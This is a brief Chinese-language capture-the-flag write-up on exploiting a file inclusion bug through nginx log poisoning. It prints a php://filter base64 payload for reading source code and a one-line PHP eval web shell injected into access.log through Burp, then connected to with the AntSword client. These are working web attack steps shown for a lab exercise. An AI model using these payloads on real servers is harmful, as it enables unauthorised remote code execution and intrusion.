日志包含漏洞
驗證是文件包含漏洞
想讀取源碼,但是返回error
?url=php://filter/read=convert.base64-encode/resource=index.php
參考了一點其他大佬的WP
通過查看請求頭可以知道服務器為Ubuntu,由nginx搭建的網站,
nginx的日志文件在/var/log/nginx/access.log和/var/log/nginx/error.log,其中access.log可以打開
為了防止url編碼,需要使用burp
如果直接在url里面插入一句話會返回:
400 Bad Request
因此只能在burp參數里面插入一句話
<?php eval($_POST['hack']);?>
之后用蟻劍連接access.log文件就行了,之前的一句話就插入到這里面了,但是網頁上是無法顯示出來的
得到flag:
